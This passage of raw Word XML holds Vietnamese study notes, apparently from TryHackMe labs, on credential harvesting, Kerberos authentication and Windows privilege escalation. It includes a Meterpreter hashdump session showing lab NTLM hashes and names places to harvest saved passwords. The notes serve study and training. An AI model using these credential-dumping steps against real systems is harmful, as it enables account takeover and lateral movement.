        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Credentials Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E072FD" w14:textId="5D48AF44" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thu thập thông tin xác thực bao gồm các kỹ thuật để có được thông tin đăng nhập như thông tin đăng nhập, tên tài khoản và</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mật khẩu. Nó là một kỹ thuật trích xuất thông tin xác thực từ một hệ thống ở nhiều vị trí khác nhau như clear-text files, registry,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memory dumping, v.v.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165E280" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878A110" w14:textId="2CAF20D8" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:r>
        <w:t>Active Directory (AD) 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14:paraId="400D06D4" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thập</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thông tin xác thực </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BB7DD" w14:textId="0E5540DD" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>à một thuật ngữ để có quyền truy cập vào thông tin đăng nhập của người dùng và hệ thống. Đó là một kỹ thuật để tìm kiếm hoặc đánh cắp thông tin đăng nhập được lưu trữ, bao gồm cả Network Sniffing, trong đó kẻ tấn công nắm bắt thông tin đăng nhập được truyền đi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A624A4" w14:textId="0521643F" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Truy cập thông tin đăng nhập: Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F6ED8" w14:textId="043A68D7" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:r>
        <w:t>Truy cập thông tin xác thực là nơi đối thủ có thể tìm thấy thông tin đăng nhập trong các hệ thống bị xâm phạm và có quyền truy cập vào thông tin đăng nhập của người dùng. Nó giúp đối thủ sử dụng lại chúng hoặc mạo danh danh tính của người dùng. Đây là một bước quan trọng để lateral movement và truy cập các tài nguyên khác như các ứng dụng hoặc hệ thống khác. Có được thông tin đăng nhập người dùng hợp pháp được ưu tiên hơn là khai thác các hệ thống sử dụng CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D912EE1" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRDefault="00AB32F0" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4B634" w14:textId="35C40C1C" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:r>
        <w:t>là một thiết bị phần mềm hoặc phần cứng để theo dõi và đăng nhập các hoạt động gõ bàn phím. Keylogger ban đầu được thiết kế cho các mục đích hợp pháp như phản hồi để phát triển phần mềm hoặc kiểm soát của phụ huynh. Tuy nhiên, chúng có thể bị lạm dụng để đánh cắp dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D116E28" w14:textId="3C834B60" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Security Account Manager (SAM) Trình quản lý tài khoản bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF6AEF" w14:textId="1603BECE" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:r>
        <w:t>SAM là một cơ sở dữ liệu Microsoft Windows có chứa thông tin tài khoản cục bộ như tên người dùng và mật khẩu. Cơ sở dữ liệu SAM lưu trữ các chi tiết này ở định dạng được mã hóa để làm cho chúng khó truy xuất hơn. Hơn nữa, nó không thể được đọc và truy cập bởi bất kỳ người dùng nào trong khi hệ điều hành Windows đang chạy. Tuy nhiên, có nhiều cách và cuộc tấn công khác nhau để dumping nội dung của cơ sở dữ liệu SAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBA4D4" w14:textId="6393CE57" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>HashDump của Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA0424" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dumping the SAM database content </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EE3D6" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385FDA0A" w14:textId="04026127" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter &gt; getuid Server username: THM\Administrator meterpreter &gt; hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d80d18385cea5ab3aa2a4261::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d::: CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:443e64439a4b7fe780db47fc06a3342d:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F345AA" w14:textId="619DA691" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Registry Hives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BF099" w14:textId="7C7CF4AC" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:r>
        <w:t>Một phương pháp khả thi khác để dumping nội dung cơ sở dữ liệu SAM là thông qua Windows Registry. Windows registry cũng lưu trữ một bản sao của một số nội dung cơ sở dữ liệu SAM được sử dụng bởi các dịch vụ Windows. May mắn thay, chúng ta có thể lưu giá trị của sổ đăng ký Windows bằng công cụ reg.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9A3C1" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Giao thức Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6888A88C" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác thực Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6E431" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dưới đây là quy trình mười hai bước để xác thực Kerberos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D03C4" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Người dùng chia sẻ tên người dùng, mật khẩu và tên miền của họ với khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041EA2BD" w14:textId="02375D8F" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Khách hàng tập hợp một gói — hoặc một trình xác thực — chứa tất cả thông tin liên quan về máy khách, bao gồm tên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>người dùng, ngày và giờ. Tất cả thông tin có trong trình xác thực, ngoài tên người dùng, được mã hóa bằng mật khẩu của</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655DD5E" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Khách hàng gửi trình xác thực được mã hóa đến KDC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C75CC9" w14:textId="5C7FF68D" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. KDC kiểm tra tên người dùng để thiết lập danh tính của khách hàng. KDC sau đó kiểm tra cơ sở dữ liệu AD để tìm mật</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khẩu của người dùng. Sau đó, nó cố gắng giải mã trình xác thực bằng mật khẩu. Nếu KDC có thể giải mã trình xác thực,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>danh tính của khách hàng sẽ được xác minh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F787DDF" w14:textId="25F8DE64" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Sau khi danh tính của khách hàng được xác minh, KDC sẽ tạo một vé hoặc khóa phiên, cũng được mã hóa và gửi đến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52625F1F" w14:textId="401B9F04" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Khóa vé hoặc khóa phiên được lưu trữ trong khay Kerberos của khách hàng; vé có thể được sử dụng để truy cập máy chủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong một khoảng thời gian nhất định, thường là 8 giờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E80BEB" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7. Nếu khách hàng cần truy cập vào một máy chủ khác, nó sẽ gửi vé gốc đến KDC cùng với yêu cầu truy cập tài nguyên mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F994F8" w14:textId="46FAA59E" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. KDC giải mã vé bằng chìa khóa của nó. (Khách hàng không cần xác thực người dùng vì KDC có thể sử dụng vé để xác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minh rằng danh tính của người dùng đã được xác nhận trước đó).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D24B144" w14:textId="47ECEC35" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9. KDC tạo ra một vé cập nhật hoặc khóa phiên để khách hàng truy cập tài nguyên được chia sẻ mới. Vé này cũng được mã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hóa bằng khóa của máy chủ. KDC sau đó sẽ gửi vé này cho khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B13BD2" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10. Máy khách lưu khóa phiên mới này trong khay Kerberos của nó và gửi một bản sao đến máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150B104" w14:textId="77777777" w:rsidR="00782BE4" w:rsidRPr="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11. Máy chủ sử dụng mật khẩu riêng của mình để giải mã vé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C369A3" w14:textId="6241BF70" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12. Nếu máy chủ giải mã thành công khóa phiên, thì vé là hợp pháp. Sau đó, máy chủ sẽ mở ticket và xem lại danh sách kiểm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>soát truy cập (ACL) để xác định xem máy khách có quyền cần thiết để truy cập tài nguyên hay không.</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A053B" w14:textId="51CAF62C" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--------------------------(Windows Privl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252CD6C" w14:textId="6D9FA776" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E84431" w14:textId="5E8548E4" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tryhackme: </w:t>
      </w:r>
      <w:r>
        <w:t>Windows Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A4073" w14:textId="30302D85" w:rsidR="00782BE4" w:rsidRDefault="00782BE4" w:rsidP="00782BE4">
      <w:r>
        <w:t xml:space="preserve">Leo thang đặc quyền bao gồm việc sử dụng quyền truy cập được cấp cho một máy chủ với user A, và tận dụng nó để có quyền truy cập vào user B bằng cách lạm dụng điểm yếu trong hệ thống mục tiêu. Mặc dù mong muốn rằng user AB có </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>quyền quản trị viên, nhưng có thể có những tình huống mà chúng tôi sẽ cần phải leo thang sang các acc khác trước khi thực sự nhận được đặc quyền quản trị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2AE49" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00782BE4">
      <w:r>
        <w:t xml:space="preserve">Có được quyền truy cập vào các tài khoản khác nhau có thể đơn giản như tìm thông tin đăng nhập trong các tệp văn bản hoặc bảng tính không được bảo mật bởi một số người dùng ko sử dụng một cách an toàn nhưng ko phải lúc nào cung chính xác. Tùy thuộc vào tình huống, mà có thể cần phải lạm dụng một số điểm yếu như: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D71DB8A" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cấu hình sai trên các dịch vụ Windows hoặc các tác vụ lên lịch </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54558AFE" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các đặc quyền quá mức được gán cho tài khoản </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285019B" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phần mềm dễ bị tấn công, chứa lỗ hổng, yếu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F14B8" w14:textId="3F315EB6" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Thiếu các bản update, fix lỗi bảo mật Win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC28715" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows Users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4123D" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:r>
        <w:t xml:space="preserve">Hệ thống Windows chủ yếu có hai loại người dùng. Tùy thuộc vào mức độ truy cập mà có thể phân theo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA0DF1" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Administrators: Những người dùng này có nhiều đặc quyền nhất. Họ có thể thay đổi bất kỳ tham số cấu hình hệ thống nào và truy cập bất kỳ tệp nào trong hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B44AE" w14:textId="00822861" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Standard Users: Những người dùng này có thể truy cập vào máy tính nhưng chỉ thực hiện các tác vụ hạn chế. Thông thường, những người dùng này không thể thực hiện các thay đổi vĩnh viễn hoặc cần thiết cho hệ thống và bị giới hạn trong các tệp của họ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF9BC0" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:r>
        <w:t xml:space="preserve">Ngoài ra, một số tài khoản tích hợp đặc biệt được hệ điều hành sử dụng trong đặc quyền leo thang: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBBEEA" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SYSTEM / LocalSystem: Một tài khoản được sử dụng bởi hệ điều hành để thực hiện các tác vụ nội bộ. Nó có toàn quyền truy cập vào tất cả các tệp và tài nguyên có sẵn trên máy chủ với các đặc quyền thậm chí còn cao hơn administrators. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF54D9" w14:textId="77777777" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local Service: Tài khoản mặc định được sử dụng để chạy các dịch vụ Windows với đặc quyền "tối thiểu". Nó sẽ sử dụng các kết nối ẩn danh qua mạng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53C132" w14:textId="218A349A" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Network Service: Tài khoản mặc định được sử dụng để chạy các dịch vụ Windows với đặc quyền "tối thiểu". Nó sẽ sử dụng thông tin đăng nhập máy tính để xác thực thông qua mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10CB7D" w14:textId="1C89CE8F" w:rsidR="00E15BA2" w:rsidRDefault="00E15BA2" w:rsidP="00E15BA2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Harvesting Passwords from Usual Spots ( thu thập thông tin từ các điểm thông thường)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5F6D3" w14:textId="10FF11AE" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Powershell History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455FC9B" w14:textId="07AFDC68" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Saved Windows Credentials Win cho phép sử dụng thông tin đăng nhập của người dùng khác, liệt kê thông tin đăng nhập đã lưu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A726F3" w14:textId="1FAACF11" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FDF72" w14:textId="77777777" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71546FC7" w14:textId="77777777" w:rsidR="00AA7210" w:rsidRDefault="00AA7210" w:rsidP="00AA7210">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
